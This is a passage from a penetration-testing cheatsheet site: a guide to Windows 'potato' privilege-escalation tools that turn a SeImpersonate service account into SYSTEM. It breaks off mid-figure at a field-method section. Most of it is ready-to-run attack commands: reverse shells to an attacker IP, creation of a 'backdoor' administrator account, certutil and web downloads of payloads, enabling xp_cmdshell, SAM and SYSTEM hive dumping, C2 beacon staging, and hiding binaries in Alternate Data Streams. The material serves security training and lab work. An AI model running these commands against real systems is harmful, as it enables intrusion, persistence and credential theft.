daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

potato-attacks-guide.md (46699B)


      1 ---
      2 title: "Potato Attacks — SeImpersonate to SYSTEM"
      3 description: "Windows SeImpersonate → SYSTEM with the whole potato family (PrintSpoofer, GodPotato, JuicyPotatoNG, RoguePotato, EfsPotato, SweetPotato): what each abuses, every useful flag, delivery from MSSQL/IIS/WinRM, and a repeatable field method with an HTB Jeeves worked example."
      4 category: pentest-workflow
      5 subcategory: "Companion Guides"
      6 order: 25
      7 tags: ["htb", "cpts", "windows", "privilege-escalation", "token-impersonation", "seimpersonate", "potato", "printspoofer", "godpotato", "juicypotatong", "roguepotato", "efspotato", "sweetpotato", "pentest-workflow"]
      8 tools: ["PrintSpoofer", "GodPotato", "JuicyPotatoNG", "RoguePotato", "EfsPotato", "SweetPotato", "socat", "xp_cmdshell"]
      9 difficulty: advanced
     10 updated: "2026-09-17"
     11 source: "vault:PrivEsc/PrivEsc - Windows.md (Token Manipulation & Potato Attacks)"
     12 ---
     13 
     14 [← Windows PrivEsc cheat sheet](/sheets/pentest-workflow/privilege-escalation) · [Workflow dashboard](/sheets/pentest-workflow/attack-flow-dashboard) · [Windows PrivEsc master guide](/sheets/privilege-escalation/windows-privesc) · [Alternate Data Streams guide →](/sheets/pentest-workflow/alternate-data-streams-guide)
     15 
     16 # Potato Attacks — SeImpersonate to SYSTEM `fas:ClipboardList`
     17 
     18 > [!dashboard] What this is
     19 > The long-form companion to the potato line in the [Windows Privilege Escalation cheat sheet](/sheets/pentest-workflow/privilege-escalation). The cheat sheet gives you the one-liner mid-box; this guide explains *what each potato actually abuses*, walks every useful flag, and shows how to deliver them from an MSSQL shell / IIS web shell / WinRM. Once you land SYSTEM, pair it with the [Alternate Data Streams guide](/sheets/pentest-workflow/alternate-data-streams-guide) — staging the binary off a directory listing, stripping Mark-of-the-Web, and finding data (including flags) other users hid in a stream.
     20 
     21 Almost every service account on Windows — `IIS APPPOOL\*`, `NT SERVICE\MSSQLSERVER`, `LOCAL SERVICE`, `NETWORK SERVICE`, and most third-party service accounts — holds **`SeImpersonatePrivilege`**. That one privilege is the whole game. If you land a shell as one of these accounts (a web shell, `xp_cmdshell`, a cracked service credential), a potato turns it into `NT AUTHORITY\SYSTEM` in a single command. The potatoes differ only in *how they trick SYSTEM into authenticating to something you control* so you can steal its token.
     22 
     23 ## The gate check — do you even have a potato path? `fas:Terminal`
     24 
     25 Everything here lives or dies on one line. Run it first, every time:
     26 
     27 ```batch
     28 whoami /priv
     29 ```
     30 
     31 You are looking for either of these in the **Enabled** state:
     32 
     33 | Privilege | What it lets you do | Who usually has it |
     34 |---|---|---|
     35 | `SeImpersonatePrivilege` | Impersonate a client after it authenticates to you | IIS AppPool, MSSQL, `LOCAL SERVICE`, `NETWORK SERVICE`, most service accounts |
     36 | `SeAssignPrimaryTokenPrivilege` | Assign a primary token to a new process | Some service accounts, scheduled-task contexts |
     37 
     38 > [!warning]+ No privilege, no potato
     39 > `fas:TriangleExclamation`
     40 > If `whoami /priv` shows neither privilege (or shows them **Disabled** with no way to enable them), the potato family is a dead end — go back to the [Windows PrivEsc cheat sheet](/sheets/pentest-workflow/privilege-escalation) for services, registry, credential hunting, and kernel paths. A privilege that is present but *Disabled* is fine: potatoes enable it themselves at runtime through the token they steal.
     41 
     42 ### How a potato works (the shared skeleton)
     43 
     44 Every tool below follows the same three beats. Only step 1 changes between them.
     45 
     46 <figure class="flow plate corners">
     47   <figcaption class="flow__cap"><span class="flow__kind">The potato pattern — four beats</span><span class="flow__dir">LR</span></figcaption>
     48   <div class="flow__body">
     49     <div class="flow__diagram" data-dir="lr">
     50       <div class="flow-rank"><div class="flow-node is-entry">1 · Coerce SYSTEM to authenticate<span class="sub">to a listener you control</span><span class="sub">(Spooler pipe / DCOM OXID / EFS RPC)</span></div></div>
     51       <div class="flow-edge"></div>
     52       <div class="flow-rank"><div class="flow-node">2 · Catch the auth and negotiate<span class="sub">a SYSTEM security context</span><span class="sub">(NTLM / SSPI)</span></div></div>
     53       <div class="flow-edge"></div>
     54       <div class="flow-rank"><div class="flow-node">3 · Impersonate the SYSTEM token<span class="sub">(needs SeImpersonate)</span></div></div>
     55       <div class="flow-edge"></div>
     56       <div class="flow-rank"><div class="flow-node is-goal">4 · CreateProcessWithToken / AsUser<span class="sub">→ your command runs as SYSTEM</span></div></div>
     57     </div>
     58   </div>
     59 </figure>
     60 
     61 The named difference — Print Spooler bug, DCOM/RPC OXID resolver, MS-EFSR — is just *the coercion trick in step 1*. When one is patched or disabled, you switch tools, not techniques.
     62 
     63 > [!success]+ Grab the binaries — checksum-verified, offline mirror
     64 > `fas:Toolbox`
     65 > Mirrored on this site (self-hosted, no third-party fetch). Verify the hash before you run anything you pulled off the internet on a client box:
     66 > - **PrintSpoofer:** [PrintSpoofer64.exe](/downloads/pentest-workflow/PrintSpoofer64.exe) ([SHA-256](/downloads/pentest-workflow/PrintSpoofer64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/PrintSpoofer64.exe.sha256.asc))
     67 > - **GodPotato (.NET 4.x):** [GodPotato-NET4.exe](/downloads/pentest-workflow/GodPotato-NET4.exe) ([SHA-256](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256) · [GPG signature](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256.asc))
     68 > - **GodPotato (.NET 3.5):** [GodPotato-NET35.exe](/downloads/pentest-workflow/GodPotato-NET35.exe) ([SHA-256](/downloads/pentest-workflow/GodPotato-NET35.exe.sha256) · [GPG signature](/downloads/pentest-workflow/GodPotato-NET35.exe.sha256.asc))
     69 > - **JuicyPotato (legacy):** [JuicyPotato.exe](/downloads/pentest-workflow/JuicyPotato.exe) ([SHA-256](/downloads/pentest-workflow/JuicyPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/JuicyPotato.exe.sha256.asc))
     70 > - **SweetPotato:** [SweetPotato.exe](/downloads/pentest-workflow/SweetPotato.exe) ([SHA-256](/downloads/pentest-workflow/SweetPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SweetPotato.exe.sha256.asc))
     71 > - **nc64.exe** (reverse-shell stand-in): [nc64.exe](/downloads/pentest-workflow/nc64.exe) ([SHA-256](/downloads/pentest-workflow/nc64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/nc64.exe.sha256.asc))
     72 >
     73 > Not yet mirrored here — pull from source and rebuild/verify yourself: [JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG), [RoguePotato](https://github.com/antonioCoco/RoguePotato), [EfsPotato](https://github.com/zcgonvh/EfsPotato).
     74 
     75 ---
     76 
     77 ## Which potato, when? `fas:Route`
     78 
     79 Confirm the build first — `[environment]::OSVersion.Version` (PowerShell) or `ver` (cmd) — then work down this list. The order is "most reliable / least noisy" first.
     80 
     81 | Tool | Coercion primitive | Needs | Works on | Reach for it when |
     82 |---|---|---|---|---|
     83 | **PrintSpoofer** | Print Spooler named pipe (`\pipe\spoolss`) | SeImpersonate **+ Spooler service running** | Win10 / Server 2016–2019 (and later where Spooler is up) | First choice — one binary, no network, interactive shell. |
     84 | **GodPotato** | DCOM/RPC OXID resolver (local) | SeImpersonate, matching .NET runtime | Server 2012–2022, Win8–11 | Spooler is disabled/absent (common on Server 2019+/Win11). Broadest coverage — try it first if unsure. |
     85 | **JuicyPotatoNG** | DCOM with a working CLSID + local SSPI on port 10247 | SeImpersonate | Win10 / Server 2016–2022 (pre-patch) | You want the classic JuicyPotato technique revived on a modern build; PrintSpoofer/GodPotato both failed. |
     86 | **RoguePotato** | Remote OXID resolver via a redirector on port 135 | SeImpersonate + outbound/redirected 135 | Server 2019 / Win10 1809+ | DCOM is usable but you need the fake OXID trick; you can stand up a `socat` redirector. |
     87 | **EfsPotato** | MS-EFSR (EFS RPC) local coercion | SeImpersonate or SeAssignPrimaryToken | Modern builds; multiple RPC interfaces to dodge patches | Great from `xp_cmdshell` / web shells; small, self-contained, swaps RPC pipes when one is patched. |
     88 | **SweetPotato** | Bundles several (EfsRpc, PrintSpoofer, RottenPotato, DCOM) | SeImpersonate | Modern builds | You want one binary with a fallback `-e` selector; good "if this fails, switch mode" tool. |
     89 
     90 <figure class="flow plate corners">
     91   <figcaption class="flow__cap"><span class="flow__kind">Which potato? — a fallback ladder</span><span class="flow__dir">TD</span></figcaption>
     92   <div class="flow__body">
     93     <svg class="flow-svg" viewBox="0 0 630 720" role="img" aria-label="Decision tree for choosing a potato privilege-escalation tool, falling through PrintSpoofer, GodPotato, SweetPotato, JuicyPotatoNG and RoguePotato as each fails">
     94       <path class="fedge" d="M360,90 L360,150" marker-end="url(#flow-arrow)" />
     95       <path class="fedge" d="M300,90 L300,120 L120,120 L120,150" marker-end="url(#flow-arrow)" />
     96       <path class="fedge" d="M300,210 L300,240 L120,240 L120,270" marker-end="url(#flow-arrow)" />
     97       <path class="fedge" d="M420,210 L420,240 L470,240 L470,270" marker-end="url(#flow-arrow)" />
     98       <path class="fedge is-back" d="M235,300 L355,300" marker-end="url(#flow-arrow)" />
     99       <path class="fedge is-back" d="M470,330 L470,390" marker-end="url(#flow-arrow)" />
    100       <path class="fedge is-back" d="M470,450 L470,510" marker-end="url(#flow-arrow)" />
    101       <path class="fedge is-back" d="M470,570 L470,630" marker-end="url(#flow-arrow)" />
    102       <g class="fnode is-decision"><rect class="fnode__box" x="245" y="30" width="230" height="60" /><text class="fnode__label" x="360" y="48" text-anchor="middle">whoami /priv:<tspan class="sub" x="360" dy="14">SeImpersonate or</tspan><tspan class="sub" x="360" dy="14">SeAssignPrimaryToken?</tspan></text></g>
    103       <g class="fnode is-note"><rect class="fnode__box" x="5" y="150" width="230" height="60" /><text class="fnode__label" x="120" y="176" text-anchor="middle">Not a potato box —<tspan class="sub" x="120" dy="15">services / registry / creds / kernel</tspan></text></g>
    104       <g class="fnode is-decision"><rect class="fnode__box" x="245" y="150" width="230" height="60" /><text class="fnode__label" x="360" y="176" text-anchor="middle">Print Spooler<tspan class="sub" x="360" dy="15">service running?</tspan></text></g>
    105       <g class="fnode"><rect class="fnode__box" x="5" y="270" width="230" height="60" /><text class="fnode__label" x="120" y="296" text-anchor="middle">PrintSpoofer<tspan class="sub" x="120" dy="15">(interactive SYSTEM shell)</tspan></text></g>
    106       <g class="fnode"><rect class="fnode__box" x="355" y="270" width="230" height="60" /><text class="fnode__label" x="470" y="296" text-anchor="middle">GodPotato<tspan class="sub" x="470" dy="15">(pick NET4 / NET35 by runtime)</tspan></text></g>
    107       <g class="fnode"><rect class="fnode__box" x="355" y="390" width="230" height="60" /><text class="fnode__label" x="470" y="416" text-anchor="middle">SweetPotato -e EfsRpc<tspan class="sub" x="470" dy="15">or EfsPotato (swap RPC pipe)</tspan></text></g>
    108       <g class="fnode"><rect class="fnode__box" x="355" y="510" width="230" height="60" /><text class="fnode__label" x="470" y="536" text-anchor="middle">JuicyPotatoNG<tspan class="sub" x="470" dy="15">(-s to seek a CLSID)</tspan></text></g>
    109       <g class="fnode"><rect class="fnode__box" x="355" y="630" width="230" height="60" /><text class="fnode__label" x="470" y="656" text-anchor="middle">RoguePotato<tspan class="sub" x="470" dy="15">(+ socat :135 redirector)</tspan></text></g>
    110       <g class="felabel"><rect class="felabel__box" x="343" y="112" width="34" height="16" /><text class="felabel__text" x="360" y="123" text-anchor="middle">Yes</text></g>
    111       <g class="felabel"><rect class="felabel__box" x="197" y="112" width="26" height="16" /><text class="felabel__text" x="210" y="123" text-anchor="middle">No</text></g>
    112       <g class="felabel"><rect class="felabel__box" x="193" y="232" width="34" height="16" /><text class="felabel__text" x="210" y="243" text-anchor="middle">Yes</text></g>
    113       <g class="felabel"><rect class="felabel__box" x="432" y="232" width="26" height="16" /><text class="felabel__text" x="445" y="243" text-anchor="middle">No</text></g>
    114       <g class="felabel"><rect class="felabel__box" x="274" y="292" width="42" height="16" /><text class="felabel__text" x="295" y="303" text-anchor="middle">fails</text></g>
    115       <g class="felabel"><rect class="felabel__box" x="449" y="352" width="42" height="16" /><text class="felabel__text" x="470" y="363" text-anchor="middle">fails</text></g>
    116       <g class="felabel"><rect class="felabel__box" x="449" y="472" width="42" height="16" /><text class="felabel__text" x="470" y="483" text-anchor="middle">fails</text></g>
    117       <g class="felabel"><rect class="felabel__box" x="395" y="592" width="150" height="16" /><text class="felabel__text" x="470" y="603" text-anchor="middle">DCOM blocked outbound</text></g>
    118     </svg>
    119   </div>
    120 </figure>
    121 
    122 ---
    123 
    124 ## PrintSpoofer `fas:Terminal`
    125 
    126 **Abuses:** the Print Spooler service. PrintSpoofer coerces `spoolsv.exe` (running as SYSTEM) to connect back to a named pipe it controls, then impersonates the SYSTEM token off that pipe. No network egress, no DCOM — everything happens over local IPC.
    127 
    128 **Requirements:** `SeImpersonatePrivilege` **and** the Print Spooler service running (`sc query spooler` → `RUNNING`). On many Server 2019+/Win11 builds the Spooler is disabled by default post-PrintNightmare — that is your cue to switch to GodPotato.
    129 
    130 ```batch
    131 :: Interactive SYSTEM shell in your current console — the go-to
    132 PrintSpoofer64.exe -i -c cmd
    133 
    134 :: Fire a single command as SYSTEM (non-interactive)
    135 PrintSpoofer64.exe -c "whoami"
    136 PrintSpoofer64.exe -c "net localgroup administrators lowpriv /add"
    137 
    138 :: Reverse shell back to your handler (catch with: nc -lnvp 8443)
    139 PrintSpoofer64.exe -c "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd"
    140 
    141 :: Spawn on a specific logon session (e.g. pop a shell on an RDP user's desktop)
    142 PrintSpoofer64.exe -d 1 -c cmd
    143 ```
    144 
    145 | Flag | Meaning |
    146 |---|---|
    147 | `-c <CMD>` | Command to run as SYSTEM (wrap in quotes; use `cmd /c ...` for shell built-ins) |
    148 | `-i` | Interact with the new process in the **current** console — this is what gives you a live SYSTEM shell |
    149 | `-d <SESSION_ID>` | Create the process in the given logon session / desktop (see `query session`) |
    150 | `-p <PROGRAM>` | Program to launch (default `C:\Windows\System32\cmd.exe`) |
    151 | `-h` | Help |
    152 
    153 > [!tip]+ Everything PrintSpoofer can do
    154 > `fas:Lightbulb`
    155 > Anything `cmd`/a program can do, now as SYSTEM: pop an interactive shell (`-i -c cmd`), run one command (`-c`), throw a reverse shell, add a local admin, launch a Meterpreter/Sliver stager, read `C:\Windows\System32\config\SAM`, or spawn on another user's desktop with `-d`. It does **not** need outbound network — ideal on segmented internal hosts where DCOM/135 is filtered.
    156 
    157 ---
    158 
    159 ## GodPotato `fas:Terminal`
    160 
    161 **Abuses:** DCOM. GodPotato stands up a local fake OXID resolver and drives a DCOM activation so a SYSTEM RPC context authenticates to it, then impersonates. It is the broadest-coverage modern potato — **Server 2012 through 2022, Windows 8 through 11** — and needs no Print Spooler.
    162 
    163 **Requirements:** `SeImpersonatePrivilege` and a matching .NET runtime. Pick the binary by what is installed: `GodPotato-NET4.exe` for .NET 4.x (the common case), `GodPotato-NET35.exe` when only .NET 2.0/3.5 is present. Check with `dir %WINDIR%\Microsoft.NET\Framework\`.
    164 
    165 ```batch
    166 :: Prove it — run whoami as SYSTEM
    167 GodPotato-NET4.exe -cmd "cmd /c whoami"
    168 
    169 :: Add a local admin / new user
    170 GodPotato-NET4.exe -cmd "cmd /c net user backdoor P@ssw0rd123! /add"
    171 GodPotato-NET4.exe -cmd "cmd /c net localgroup administrators backdoor /add"
    172 
    173 :: Reverse shell (catch with nc -lnvp 8443)
    174 GodPotato-NET4.exe -cmd "cmd /c c:\tools\nc64.exe 10.10.14.3 8443 -e cmd"
    175 
    176 :: .NET 3.5-only host
    177 GodPotato-NET35.exe -cmd "cmd /c whoami"
    178 ```
    179 
    180 | Flag | Meaning |
    181 |---|---|
    182 | `-cmd <COMMAND>` | Command to execute as SYSTEM (prefix with `cmd /c` for built-ins like `whoami`, `net`, `type`) |
    183 | `-rpc_port <PORT>` | Pin the internal RPC listener port (default is chosen automatically; set it if a port collides) |
    184 | `-h` | Help |
    185 
    186 > [!tip]+ Everything GodPotato can do
    187 > `fas:Lightbulb`
    188 > Single-shot command execution as SYSTEM with the widest OS coverage of the family and **no Spooler and no external network** required. Use it to run a reverse shell, add an admin, dump hives, or kick off a C2 stager. Because it is fully local it is the reliable fallback whenever PrintSpoofer's Spooler dependency isn't met. It runs one command per invocation, so for a shell, have it launch `nc64.exe` or a stager rather than expecting an interactive prompt.
    189 
    190 ---
    191 
    192 ## JuicyPotatoNG `fas:Terminal`
    193 
    194 **Abuses:** DCOM, like the original JuicyPotato, but revived for modern Windows. It uses a CLSID that still resolves for service accounts and negotiates the SYSTEM context locally over SSPI on a fixed port (default **10247**), sidestepping the 2018 DCOM hardening that killed classic JuicyPotato.
    195 
    196 **Requirements:** `SeImpersonatePrivilege`. Works on Windows 10 / Server 2016–2022 depending on patch level. Not bundled here — build from [source](https://github.com/antonioCoco/JuicyPotatoNG).
    197 
    198 ```batch
    199 :: Default run — uses a built-in working CLSID and port 10247, runs cmd
    200 JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami"
    201 
    202 :: Reverse shell
    203 JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c c:\tools\nc64.exe 10.10.14.3 8443 -e cmd"
    204 
    205 :: Let it seek a usable CLSID for this exact build
    206 JuicyPotatoNG.exe -s -p "C:\Windows\System32\cmd.exe" -a "/c whoami"
    207 
    208 :: Custom COM listen port if 10247 is taken
    209 JuicyPotatoNG.exe -t * -l 10999 -p cmd.exe -a "/c whoami"
    210 ```
    211 
    212 | Flag | Meaning |
    213 |---|---|
    214 | `-t <a\|u\|*>` | Token-creation call: `u` = `CreateProcessWithTokenW` (needs SeImpersonate), `a` = `CreateProcessAsUser` (needs SeAssignPrimaryToken), `*` = try both |
    215 | `-p <PROGRAM>` | Program to launch (default `cmd.exe`) |
    216 | `-a <ARGS>` | Arguments passed to the program (e.g. `"/c whoami"`) |
    217 | `-l <PORT>` | Local COM server listen port (default `10247`) |
    218 | `-c <CLSID>` | Use a specific CLSID instead of the built-in default |
    219 | `-s` | Seek — probe for a CLSID that works on this host |
    220 | `-b` | Bruteforce all CLSIDs (loud; last resort) |
    221 | `-i` | Interactive (run the program in the current console) |
    222 
    223 > [!info]+ JuicyPotatoNG vs. the legacy JuicyPotato
    224 > `fas:Lightbulb`
    225 > The bundled [JuicyPotato.exe](/downloads/pentest-workflow/JuicyPotato.exe) is the **legacy** tool — dead on Server 2019 / Windows 10 1809 and later because of DCOM hardening; keep it only for Server 2016-and-older targets (`JuicyPotato.exe -l 53375 -p cmd.exe -a "/c whoami" -t *`, needs a CLSID matching the OS). **JuicyPotatoNG** is the modern rewrite that works past that hardening. If you're on anything current, use NG, not the legacy binary.
    226 
    227 ---
    228 
    229 ## RoguePotato `fas:Terminal`
    230 
    231 **Abuses:** DCOM with a *remote* OXID resolver. RoguePotato forces the DCOM OXID resolution to go out to TCP **135** on a host you control, which redirects it back to a local listener — letting you complete the SYSTEM NTLM negotiation on builds where the fully-local trick doesn't fire.
    232 
    233 **Requirements:** `SeImpersonatePrivilege`, and the ability to reach an attacker-controlled resolver on port 135 (you run a `socat` redirector). This is the one potato with a network dependency. Not bundled here — build from [source](https://github.com/antonioCoco/RoguePotato).
    234 
    235 ```bash
    236 # On YOUR box: redirect victim's 135 back to its RoguePotato listener (default 9999)
    237 socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999
    238 ```
    239 
    240 ```batch
    241 :: On the victim: -r = your redirector IP, -l = local OXID listener, -e = command
    242 RoguePotato.exe -r 10.10.14.3 -e "cmd.exe /c whoami > C:\Windows\Temp\r.txt" -l 9999
    243 
    244 :: Reverse shell variant
    245 RoguePotato.exe -r 10.10.14.3 -e "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" -l 9999
    246 ```
    247 
    248 | Flag | Meaning |
    249 |---|---|
    250 | `-r <IP>` | Remote OXID resolver IP — your box running the `socat` redirect on 135 |
    251 | `-e <COMMAND>` | Command to execute as SYSTEM |
    252 | `-l <PORT>` | Local fake OXID resolver listen port (default `9999`; must match the `socat` target) |
    253 | `-c <CLSID>` | Specific CLSID to activate |
    254 | `-p <PIPE>` | Named pipe to use (advanced) |
    255 | `-z` | Test mode — check whether the technique will work without executing |
    256 
    257 > [!warning]+ RoguePotato needs egress to port 135
    258 > `fas:TriangleExclamation`
    259 > If outbound/redirected 135 to your redirector is blocked (very common on segmented internal networks), RoguePotato can't complete. In that case fall back to a fully-local potato — GodPotato, EfsPotato, or SweetPotato's EfsRpc mode — which need no network at all.
    260 
    261 ---
    262 
    263 ## EfsPotato `fas:Terminal`
    264 
    265 **Abuses:** MS-EFSR, the Encrypting File System Remote Protocol (the same RPC family as PetitPotam). EfsPotato coerces SYSTEM to authenticate to a local pipe via an EFS RPC call, then impersonates. It exposes **several RPC interfaces**, so when Microsoft patches one you switch to another with a single argument.
    266 
    267 **Requirements:** `SeImpersonatePrivilege` **or** `SeAssignPrimaryTokenPrivilege`. It is tiny and self-contained, which makes it a favourite from `xp_cmdshell` and cramped web shells. Not bundled here — grab or compile from [source](https://github.com/zcgonvh/EfsPotato) (single `.cs`, buildable on-target with `csc.exe`).
    268 
    269 ```batch
    270 :: Simplest form — run a command as SYSTEM
    271 EfsPotato.exe "whoami"
    272 EfsPotato.exe "net user backdoor P@ssw0rd123! /add"
    273 
    274 :: Pick a specific RPC pipe when the default is patched
    275 ::   valid pipes: lsarpc | efsrpc | samr | lsass | netlogon
    276 EfsPotato.exe "whoami" lsarpc
    277 EfsPotato.exe "whoami" efsrpc
    278 
    279 :: Reverse shell
    280 EfsPotato.exe "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd"
    281 ```
    282 
    283 ```powershell
    284 # Compile on-target if you only have the .cs (no external toolchain needed)
    285 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /nowarn:1691,618 EfsPotato.cs
    286 ```
    287 
    288 | Argument | Meaning |
    289 |---|---|
    290 | `<command>` (1st positional) | Command to run as SYSTEM |
    291 | `<pipe>` (2nd positional, optional) | RPC interface to abuse: `lsarpc`, `efsrpc`, `samr`, `lsass`, `netlogon` — rotate through these if the default is blocked/patched |
    292 
    293 > [!tip]+ Everything EfsPotato can do
    294 > `fas:Lightbulb`
    295 > Fully local (no Spooler, no network), tiny, and compilable on-target — which is why it shines from MSSQL `xp_cmdshell` and low-footprint web shells. Its standout feature is the **swappable RPC pipe**: if `EfsPotato.exe "whoami"` fails because one interface is patched, retry with `lsarpc`, then `efsrpc`, then `samr`, etc. SweetPotato's `EfsRpc` mode is the same primitive wrapped in a bigger multi-tool.
    296 
    297 ---
    298 
    299 ## SweetPotato `fas:Terminal`
    300 
    301 **Abuses:** whatever you select. SweetPotato bundles several coercion primitives behind a `-e` switch — commonly `EfsRpc` (default), `PrintSpoofer`, and `DCOM` (older/other forks also carry `RottenPotato`) — so a single binary carries built-in fallbacks. When one mode fails, change `-e` instead of uploading a new tool. The exact set depends on the fork; run `SweetPotato.exe -h` to see what your build exposes.
    302 
    303 **Requirements:** `SeImpersonatePrivilege`. Modern builds. Bundled: [SweetPotato.exe](/downloads/pentest-workflow/SweetPotato.exe) ([SHA-256](/downloads/pentest-workflow/SweetPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SweetPotato.exe.sha256.asc)).
    304 
    305 ```batch
    306 :: Default (EfsRpc mode) — run a command as SYSTEM
    307 SweetPotato.exe -a "/c whoami"
    308 
    309 :: Force a specific technique
    310 SweetPotato.exe -e EfsRpc      -p C:\Windows\System32\cmd.exe -a "/c whoami"
    311 SweetPotato.exe -e PrintSpoofer -p C:\Windows\System32\cmd.exe -a "/c whoami"
    312 SweetPotato.exe -e DCOM        -p C:\Windows\System32\cmd.exe -a "/c whoami"
    313 
    314 :: Reverse shell
    315 SweetPotato.exe -a "/c c:\tools\nc64.exe 10.10.14.3 8443 -e cmd"
    316 ```
    317 
    318 | Flag | Meaning |
    319 |---|---|
    320 | `-e <EXPLOIT>` | Technique: `EfsRpc` (default), `PrintSpoofer`, `DCOM` (fork-dependent; some carry `RottenPotato`) |
    321 | `-p <PROGRAM>` | Program to launch (default `cmd.exe`) |
    322 | `-a <ARGS>` | Arguments (e.g. `"/c whoami"`) |
    323 | `-l <PORT>` | COM server listen port (for `DCOM`/`RottenPotato` modes) |
    324 | `-c <CLSID>` | CLSID for DCOM-based modes |
    325 
    326 > [!tip]+ Everything SweetPotato can do
    327 > `fas:Lightbulb`
    328 > It's the "one binary, several potatoes" option. Start with the default `EfsRpc`, and if it fails cycle `-e PrintSpoofer` (needs the Spooler) → `-e DCOM` → `-e RottenPotato`. Handy when you can only upload one file but don't know yet which primitive the target will accept.
    329 
    330 ---
    331 
    332 ## Delivery — getting a potato onto the box and running it `fas:RocketLaunch`
    333 
    334 You rarely get a clean interactive prompt. These are the common contexts where you already hold a `SeImpersonate` account and how to drive a potato from each. Transfer methods (SMB, HTTP, `certutil`, `iwr`) are in [Foothold — File Transfers](/sheets/pentest-workflow/foothold-file-transfers).
    335 
    336 ### From MSSQL `xp_cmdshell`
    337 
    338 MSSQL service accounts almost always hold `SeImpersonate`. This is the classic MSSQL → SYSTEM chain.
    339 
    340 ```sql
    341 -- 1) enable xp_cmdshell
    342 EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
    343 EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
    344 
    345 -- 2) confirm the privilege
    346 EXEC xp_cmdshell 'whoami /priv';
    347 
    348 -- 3) stage the potato (HTTP pull from your box)
    349 EXEC xp_cmdshell 'certutil -urlcache -f http://10.10.14.3/GodPotato-NET4.exe C:\Windows\Temp\g.exe';
    350 
    351 -- 4) fire it as SYSTEM
    352 EXEC xp_cmdshell 'C:\Windows\Temp\g.exe -cmd "cmd /c net localgroup administrators sql_svc /add"';
    353 ```
    354 
    355 ### From an IIS / ASPX web shell
    356 
    357 IIS AppPool identities hold `SeImpersonate` by design. From a web shell (`whoami` → `iis apppool\...`):
    358 
    359 ```powershell
    360 # Pull the tool, then run it — one command per web-shell request
    361 Invoke-WebRequest -Uri http://10.10.14.3/PrintSpoofer64.exe -OutFile C:\Windows\Temp\ps.exe
    362 C:\Windows\Temp\ps.exe -c "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd"
    363 ```
    364 
    365 `C:\Windows\Temp` and `C:\Windows\System32\spool\drivers\color` are usually writable by the AppPool identity — good staging spots. See [Web Shells](/sheets/pentest-workflow/foothold-shells-payloads-metasploit) for the shell itself.
    366 
    367 ### From WinRM / evil-winrm
    368 
    369 ```bash
    370 # On your box
    371 evil-winrm -i 10.10.10.100 -u svc_web -p 'Password123!'
    372 ```
    373 
    374 ```powershell
    375 # Inside the session — upload is built into evil-winrm
    376 upload /opt/tools/GodPotato-NET4.exe C:\Windows\Temp\g.exe
    377 C:\Windows\Temp\g.exe -cmd "cmd /c whoami"
    378 ```
    379 
    380 > [!tip]+ Interactive vs. one-shot potatoes
    381 > `fas:Lightbulb`
    382 > **PrintSpoofer** (`-i -c cmd`) and **JuicyPotatoNG** (`-i`) can hand you a *live* SYSTEM prompt. **GodPotato**, **EfsPotato**, **RoguePotato**, and **SweetPotato** run one command per invocation — so from those, have them launch `nc64.exe`/a C2 stager for your shell rather than expecting a prompt to appear.
    383 
    384 ### SYSTEM payload cookbook
    385 
    386 What to actually run once a potato lands you SYSTEM. Track every artefact you create for cleanup.
    387 
    388 ```batch
    389 :: Interactive shell (PrintSpoofer / JuicyPotatoNG)
    390 ... -i -c cmd
    391 
    392 :: Reverse shell (any potato) — nc -lnvp 8443 on your box
    393 ... "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd"
    394 
    395 :: Local admin (loud, logged — prefer a shell/token over a new account on real engagements)
    396 ... "cmd /c net user backdoor P@ssw0rd123! /add & net localgroup administrators backdoor /add"
    397 
    398 :: Dump the SAM/SYSTEM hives for offline hash extraction
    399 ... "cmd /c reg save HKLM\SAM C:\Windows\Temp\sam.sav /y & reg save HKLM\SYSTEM C:\Windows\Temp\sys.sav /y"
    400 
    401 :: Stage a Meterpreter/Sliver/C2 beacon as SYSTEM
    402 ... "cmd /c C:\Windows\Temp\beacon.exe"
    403 
    404 :: Hide/find data with NTFS Alternate Data Streams — see the ADS guide, linked below
    405 ... "cmd /c dir /r C:\Users\Administrator\Desktop"
    406 ```
    407 
    408 Then pull the hives and crack offline: `impacket-secretsdump -sam sam.sav -system sys.sav LOCAL`.
    409 
    410 > [!info]+ SYSTEM is also your ticket into Alternate Data Streams
    411 > `fas:Lightbulb`
    412 > Two uses, both worth knowing: **stage** the potato binary itself inside an ADS on a boring file (`type g.exe > log.txt:g.exe`) so a casual `dir` in `C:\Windows\Temp` shows nothing, then extract it back out right before you run it; and **find** data other users hid the same way — SYSTEM can now `dir /r` every profile on the box, and flags/creds/second-stage tooling turn up there more often than you'd expect. Full mechanics — reading, writing, finding, hiding, and stripping Mark-of-the-Web — are in the **[Alternate Data Streams guide](/sheets/pentest-workflow/alternate-data-streams-guide)**.
    413 
    414 ---
    415 
    416 ## Field method — finding and landing a SeImpersonate → SYSTEM chain `fas:Route`
    417 
    418 The potatoes are the easy part. The skill is the four steps *around* them: recognise that your shell holds impersonation rights, fingerprint the host so you pick a tool that actually fires on **this** build, get the binary across when the box has no download tools, then drive it non-interactively and read the result. Below is that method as a repeatable loop. A single awkward old box — HTB Jeeves, Windows 10 build 10586 — runs underneath as a case study, because the boxes where the *newest* potato fails are exactly the ones that teach you why fingerprinting matters.
    419 
    420 <figure class="flow plate corners">
